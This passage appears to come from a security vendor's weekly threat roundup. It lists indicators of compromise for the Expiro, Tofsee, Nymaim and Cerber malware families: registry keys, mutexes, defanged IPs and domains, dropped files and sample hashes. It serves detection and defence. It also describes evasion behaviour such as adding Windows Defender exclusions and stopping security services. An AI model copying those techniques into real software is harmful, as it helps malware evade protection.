ThreatGrid\n\n[](<https://1.bp.blogspot.com/-qi2ScRtKTqA/XbMW296nkQI/AAAAAAAAC2I/s7dXfc-_ixAnV-Ae-tjEWFafwfVCbDzpQCLcBGAsYHQ/s1600/587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Expiro-7350682-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Type ` | 16 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\AELOOKUPSVC \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\AELOOKUPSVC \nValue Name: Start ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 16 \nMutexes | Occurrences \n---|--- \n`kkq-vx_mtx1` | 16 \n`gazavat-svc` | 16 \n`kkq-vx_mtx67` | 16 \n`kkq-vx_mtx68` | 16 \n`kkq-vx_mtx69` | 16 \n`kkq-vx_mtx70` | 16 \n`kkq-vx_mtx71` | 16 \n`kkq-vx_mtx72` | 16 \n`kkq-vx_mtx73` | 16 \n`kkq-vx_mtx74` | 16 \n`kkq-vx_mtx75` | 16 \n`kkq-vx_mtx76` | 16 \n`kkq-vx_mtx77` | 16 \n`kkq-vx_mtx78` | 16 \n`kkq-vx_mtx79` | 16 \n`kkq-vx_mtx80` | 16 \n`kkq-vx_mtx81` | 16 \n`kkq-vx_mtx82` | 16 \n`kkq-vx_mtx83` | 16 \n`kkq-vx_mtx84` | 16 \n`kkq-vx_mtx85` | 16 \n`kkq-vx_mtx86` | 16 \n`kkq-vx_mtx87` | 16 \n`kkq-vx_mtx88` | 16 \n`kkq-vx_mtx89` | 16 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- 
\n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.exe` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe` | 16 \n`%CommonProgramFiles(x86)%\\microsoft shared\\Source Engine\\OSE.EXE` | 16 \n`%ProgramFiles(x86)%\\Microsoft Office\\Office14\\GROOVE.EXE` | 16 \n`%ProgramFiles(x86)%\\Mozilla Maintenance Service\\maintenanceservice.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngen_service.log` | 16 \n`%SystemRoot%\\Registration\\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{33EC2C09-9668-4DE7-BCC0-EFC69D7355D7}.crmlog` | 16 \n`%SystemRoot%\\SysWOW64\\dllhost.exe` | 16 \n`%SystemRoot%\\SysWOW64\\msiexec.exe` | 16 \n`%SystemRoot%\\SysWOW64\\svchost.exe` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.vir` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.vir` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.vir` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.vir` | 16 \n`%CommonProgramFiles(x86)%\\microsoft shared\\Source Engine\\ose.vir` | 16 \n`%ProgramFiles(x86)%\\Microsoft Office\\Office14\\groove.vir` | 16 \n`%ProgramFiles(x86)%\\Mozilla Maintenance Service\\maintenanceservice.vir` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.vir` | 16 \n`%SystemRoot%\\SysWOW64\\dllhost.vir` | 16 \n`%SystemRoot%\\SysWOW64\\msiexec.vir` | 16 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1lcuq8ab.default\\extensions\\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\\chrome.manifest` | 16 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 
356d00dc8ff16fb18f68ccf4f622ab551979b6e14fb802a5c7f394038e19b384 40601e6f4ecb0879bf458b2ce1912ca780b723f971a6cf7c0dd900dd97ff024c 598726fe4b882d2510f3d05d60d58627fd9cf7b90d26187c344a5d9e27902588 5fb45cd8e75ac1418c72843ab892622ebcf9b6c744b5373bd79d825ddb202814 6ef92eff4e1fa8f4093880e24a99341fbe6f9365437920f995af24a73c73a71a 701ae8d2647c886f84c538a9846abdc98ebab9adf994143e17b298f7a6158085 7450df6862c201f3954495ee2b9e1f18b699b7a050cfbfe41db2f68c04b46d76 84f35b43d4f36e1135ce90853af4b5ee0bc1b4969740e4abb2551f067027c9ee 86e65f10866176f9b20bfb6b6b793d743576f532e811e638c4a6fa238e17c900 9739ae5c12dce410017a5ca6be2f169e97d23da942eaf85e0f365a33035478a4 9ce9ec31b261d6ecd124f6b5b2b408ae1b17ca78aea5287ea2b93e1ecfb76e8e a3c8e47460067b1733559dbbc2d7245a569e3e4aa67b36c67c74ca7f64511d26 acc76ce4ad9708b1a0562fcf8cc27c1ba06e9cbac781b438bdf6b57bd775d3dd c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25 e35f51fc7fe79189d163f04b9f083bc2f0127b72645045693d864e6d0e4004af f5e1a8f1c48cd0cda719e7da167f91c3e0696f4a259a22b0160763b7aeacf602 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-LaqvOO40vjg/XbMXJX1qB7I/AAAAAAAAC2Q/NMrCii_ipxcANoafTA3hZqT3EqN0_5ONgCLcBGAsYHQ/s1600/c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_PlIsPJvDsU/XbMXNIrBrXI/AAAAAAAAC2U/TM5kKFyOyIYs0IhkCv41hxt2Hd1-Yi63wCLcBGAsYHQ/s1600/c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Tofsee-7349716-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 32 
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 20 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\kjsstakc ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jirrszjb ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qpyyzgqi ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fennovfx ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wveefmwo ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\cbkklscu ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ihqqryia ` | 2 
\n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dcllmtdv ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\vuddelvn ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lkttubld ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xwffgnxp ` | 1 \nMutexes | Occurrences \n---|--- \n`{<random GUID>}` | 4 \n`Global\\VLock` | 3 \n`Frz_State` | 1 \n`Sandboxie_SingleInstanceMutex_Control` | 1 \n`18550D22-4FCA-4AF2-9E8E-F0259D23694F` | 1 \n`b7969e9f2199` | 1 \n`<32 random hex characters>` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`103[.]248[.]137[.]133` | 28 \n`111[.]121[.]193[.]242` | 28 \n`104[.]47[.]54[.]36` | 17 \n`104[.]47[.]53[.]36` | 11 \n`40[.]113[.]200[.]201` | 7 \n`40[.]112[.]72[.]205` | 4 \n`40[.]76[.]4[.]15` | 4 \n`5[.]9[.]49[.]12` | 4 \n`144[.]76[.]133[.]38` | 4 \n`45[.]63[.]25[.]55` | 4 \n`89[.]18[.]27[.]34` | 4 \n`87[.]98[.]175[.]85` | 4 \n`104[.]215[.]148[.]63` | 3 \n`5[.]135[.]183[.]146` | 3 \n`45[.]32[.]28[.]232` | 3 \n`141[.]138[.]157[.]53` | 3 \n`45[.]63[.]99[.]180` | 3 \n`108[.]61[.]164[.]218` | 3 \n`45[.]56[.]117[.]118` | 3 \n`96[.]90[.]175[.]167` | 3 \n`104[.]238[.]186[.]189` | 3 \n`84[.]201[.]32[.]108` | 3 \n`185[.]133[.]72[.]100` | 3 \n`193[.]183[.]98[.]154` | 2 \n`23[.]94[.]5[.]133` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 28 \n`ponedobla[.]bit` | 4 \n`myexternalip[.]com` | 1 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`nekfad[.]xyz` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 28 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 28 \n`%TEMP%\\<random, matching '[0-9]{4}'>.bat` | 28 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 27 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 7 \n`%APPDATA%\\By\\By.exe` | 4 \n`%APPDATA%\\winapp\\client_id` | 3 \n`%APPDATA%\\winapp\\group_tag` | 3 \n`%System32%\\Tasks\\services update` | 3 \n`%APPDATA%\\winapp` | 3 \n`%APPDATA%\\WINAPP\\<original file name>.exe` | 3 \n`%APPDATA%\\winapp\\qtmld.exe` | 1 \n`%APPDATA%\\HNC\\User\\Common\\90\\Fonts\\Fontlist\\signons.exe` | 1 \n`\\container.dat` | 1 \n`%LOCALAPPDATA%\\589ff121627b2b278b78a4a16bbdac82a879c808` | 1 \n`%LOCALAPPDATA%\\589ff121627b2b278b78a4a16bbdac82a879c808\\container.dat` | 1 \n`%SystemRoot%\\Temp\\1676.bat` | 1 \n`%SystemRoot%\\Temp\\atfjtxxz.exe` | 1 \n`%TEMP%\\updbb837023.bat` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\compatibility.mik` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\cookies.wic` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\extensions.exe` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\webappsstore.oty` | 1 \n`%APPDATA%\\MozillaMaintenanceServiceu` | 1 \n`%APPDATA%\\MozillaMaintenanceServiceu\\MozillaMaintenanceServiceu.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 074af81963d44e82625056fa1772e2ab6e8b5bbfb58919c4ed4fea1e22df0a58 0d84479eb9868d33fc22a93e8f8a8555dc80c38a00197017bc86e91b3af9da9c 0f6a235a6e9a6eb292a6c5ada9043ad1efde537f19598849682f1eeb0d828e75 
173100397fab511b430ba1d2f417ed19fcaadfe3d8ca8e97af6a05432fbaf3a6 2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2 2e3e02ff35a656d7edfcf29878e501492d4529f68b90b9d2bfa56314f5ffac99 37c6a10dc539555beaef7b4f73418f6721a37b2dbd1f0cecd891381b779a2d22 38ae264016466acb3d215c1451898050580e2a5bbc41cfe6dc441ce9e9dc0690 39ae2c5a2c33d0182ac83cc4440fc1ff6d5c78e3f6a861d0cc2bbc67ec16d0a4 3a303bc815ab0032c143f191f949ff833b0cc31b4349de8460bb4efd7dc1d4d8 3d085c1a1719b6520867aa16997a3aaa214efb2bac1e3ba9f4365def6cd3425e 3ecff383a31433ee6ea3b4faf9a83ed88beba6836d73cf5e45c35c4b2da88fb5 49e4a03514e44969dfd0e0e9d8c6ab90aad572461e92de573ed07f2fd289e943 5099df074e08c348f605a2171b0bd2c0fd8d118eee0d2c53f70f148aa0819e3c 519e96344029271df9b3f758a6891f8342492e43f28efa02796880e8cfaedd70 51be864bb2a297d99bf04cea956400e088ff86029c0031aa9c42f0491efcb544 530d0f977e0f3f34e4876e145677280dc662ea1d84ceb23ba34c7406582bfc71 544d256e79b29963fdeb13a39843c9c40f346d1fb977927c9ede0b37d9bea71e 5d3796595808d10fc9953dc33085e88722a75238f478471cc3723e74b1fffc7f 5fa50f66fd754d9207960ddae6764e45bfb084e9134ac5c4e7755cb9a1e92825 62386fac16d57a15f34b0874a7125f20e21442da376eb7ca1eca86f9edd8cf48 63c93baef82f65d8b47634c77eb5c250ec0546e8f86395ecad2b96a0c6e726b8 655726d8f43ae4d74631cbd1dfcf0a9649461360ee402ae574cc48a2b869a913 6d7fd6fd6ef01477b0e3b075f3d0783ce9168abded6d237f4579987d3a02f744 770dba34f27b6d21d3857e54d9fbb22694428aa1d019b5da7e93d8bedcb1b92f `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JRpesC3qwbc/XbMXdJHjtUI/AAAAAAAAC2g/esOdAWClS5Ym6UbSd9AjI9s7TSoYjsZjACLcBGAsYHQ/s1600/2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rVEl9G_vIzU/XbMXf2YdJvI/AAAAAAAAC2k/OiLBgscS8TgKXJwdDI3xZW7C5bnHUZqCACLcBGAsYHQ/s1600/2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-k5JZcxpU5Ro/XbMXlPfL7ZI/AAAAAAAAC2o/yZfb6jFVztAgQi54MTKx5Jh8TtT54oawACLcBGAsYHQ/s1600/2f69e8d8f5ae09ffdfd1b1f2dbf001ad480deea5aeb47a6a563d98a16f5415d9_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7348211-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 9 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 9 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 9 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 9 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 9 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 9 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 9 \n`Local\\{74966FCB-4057-0A33-C72F-DA1761B8A937}` | 9 \n`Local\\{457A7A9B-5537-F010-1620-E1BCC38A93D1}` | 9 \n`Local\\{<random GUID>}` | 9 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`64[.]71[.]188[.]178` | 13 \n`66[.]220[.]23[.]114` | 8 \n`184[.]105[.]76[.]250` | 5 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`qjgtlozoh[.]com` | 14 \n`ezgouisk[.]pw` | 9 \n`ryron[.]com` | 1 \n`onubkqstb[.]com` | 1 \n`jeajlfdtoua[.]in` | 1 \n`ysxmebrfyg[.]net` | 1 \n`oxfab[.]pw` | 1 \n`bwapyvznpflh[.]pw` | 1 \n`voszetuy[.]in` | 1 \n`klspisvji[.]in` | 1 \n`ofiracujrsdy[.]net` | 1 \n`istpmxnf[.]net` | 1 \n`sianowq[.]pw` | 1 \n`gpkoz[.]pw` | 1 \n`sdghuwtwxsm[.]com` | 1 \n`uslrspq[.]pw` | 1 \n`kwchhgmla[.]in` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\fro.dfx` | 19 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 19 \n`%ProgramData%\\ph` | 9 \n`%ProgramData%\\ph\\fktiipx.ftf` | 9 \n`%TEMP%\\gocf.ksv` | 9 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%TEMP%\\bpnb.skg` | 1 \n`%TEMP%\\mlo.aqz` | 1 \n`\\Documents and Settings\\All Users\\ju\\xcio.cxj` | 1 \n \n#### File Hashes\n\n` 3ef2abee25c7ba9f153048e3c400f2935e3e40f988e79b55d12843a90b85a2c1 5816c31cfc9208418279e80e661be48705b54eef97612e2a3acb6b43e1520707 6743826da7e312a954d21cffa0e795599c64ac484ab913da0516d9a8c27c7d8f 74eba0187ce6b3abbc20e1ab98c0732fbf79f680b65ecd7c45eafd81370d0e5e 8dcf86bd3796d59fa421e8b2c442355a72c8a58eb489bc268063c8823bc880ba 97950901d1a3cb6713d8e59e21b4312e3ebc98f0e67071590b0b0514a67cdf1e 98e61798ed2d611ddb45b515bb45fbdd8b45ca5820f50297b4a3152e20d6768b a6bedf7f7e6fa95b3181e466468ec1812227396d18b51e027ffd670fc4699d4d a97dc1afeec16c38f5d92e1096930bfa61a60a8c4ccd3f378f5eb6f27ac5a58d ae65aa4775949b46281b12ffccd29da2aa2ba9463b7a26b17d9170153da8ab85 aee701fe3b36b6441a17ae591f6272764dfaf1361d688ca353813e022b90b545 b8d7cf0c79024e1cd6564731df735059705896d635951019b21d3719a69e64e6 bfa4b25db8ca23842ea3c6d977668c6110b0ca23919b395864065f09e8f15638 c3791696930b1226ccc03537ee50cdf275069b39524b808e3857ae9e85d6ca15 c8f6c7ff30e91b7236802bffaa759ada33ad7963bd3401912d3df9c108205a10 
d1c761853ebdfd063cbe19d1a6f5ca1823bef0f6c527064846e20f1c8df8c54e d913691cdc1b1140905af020364afbc3144989b7a7947332efb29ef95440597d de8ff7107c7566fa9d68c49f0808c2c47df83fabeaa99b70a2f30da9f6d4c1a1 deee1f14fe06f8ceac4f617cba37d027664b9bc171cf0f1a3fca9c78da4df525 e5210cb809f2f6c04d51994491cf29edcaadc338df7294051406e5dd6b0d2d8e eb5ac18bb9bbce53b7522955ee36eccc8d21c5347c54b3830c5085cb323b6838 f9f839ec0ee45b5bc8b2dc65ed2747c662de954d7b14d8d00cb1fc47878f513a fe76a31b8ac35d140fb815504c739f952bc9f1625f5d936e837af21e5f1c1b3b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-cga40gFxnJE/XbMXy6OCXXI/AAAAAAAAC2w/zrc9qRiZE8crzaw2RQaKiCatrumDLC63gCLcBGAsYHQ/s1600/3ef2abee25c7ba9f153048e3c400f2935e3e40f988e79b55d12843a90b85a2c1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mLutp8aaYd4/XbMX4-OUsWI/AAAAAAAAC20/qVuiRUpiUfsEbNjGQUsrDjZo_TzAvSMCACLcBGAsYHQ/s1600/fe76a31b8ac35d140fb815504c739f952bc9f1625f5d936e837af21e5f1c1b3b_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7343756-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 25 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 26 \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 25 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]33[.]158[.]0/27` | 26 \n`178[.]33[.]159[.]0/27` | 26 \n`178[.]33[.]160[.]0/25` | 26 \n`178[.]128[.]255[.]179` | 17 \n`150[.]109[.]231[.]116` | 15 \n`54[.]164[.]0[.]55` | 13 \n`34[.]206[.]50[.]228` | 12 \n`104[.]24[.]111[.]135` | 11 \n`104[.]24[.]110[.]135` | 6 \n`216[.]218[.]206[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 25 \n`bitaps[.]com` | 17 \n`chain[.]so` | 17 \n`btc[.]blockr[.]io` | 17 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 9 \n`hjhqmbxyinislkkt[.]1j9r76[.]top` | 5 \nFiles and or directories created | Occurrences \n---|--- \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 28 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 28 \n`\\I386\\COMPDATA\\EPSON3.TXT` | 26 \n`%TEMP%\\8f793a96\\4751.tmp` | 26 \n`%TEMP%\\8f793a96\\da80.tmp` | 26 \n`\\I386\\COMPDATA\\BOSERROR.TXT` | 26 \n`\\I386\\RUNW32.BAT` | 26 \n`%TEMP%\\tmp1.bmp` | 26 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 26 \n`%TEMP%\\d19ab989\\4710.tmp` | 25 \n`%TEMP%\\d19ab989\\a35f.tmp` | 25 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 25 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 25 \n \n#### File Hashes\n\n` 0571ddf62e8bcf0dfc91f61079145ef5a334ade39ffd45d7ce88b4cbe42a15d3 09606b24a726b8179417a36c9aca18f44ebcf98f2240fbb398b70c49090d050b 162012945f91033f3683b742d660795cc2e184f41d6db3a15703e38024ce7985 1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb 1f86d067251a326322db9afea633b6ef9419eb456eded355220fe590ea2f11c5 283bd9ce2b81146780f060c00fdb7e11701cb617a55b5b6e15217b8041fb5480 2b75044e81ecbee8f6da594a277e37d7a232e934ef9de81b8185e4c0213564a6 2dbf7bed5adcba2ce1f48736431a2041ec2c6a581a6edc4c0883f6394022316c 34012082527c5206f58fe4dc7ed65aa785864ffc57b69ef36a2684a0bd77df93 
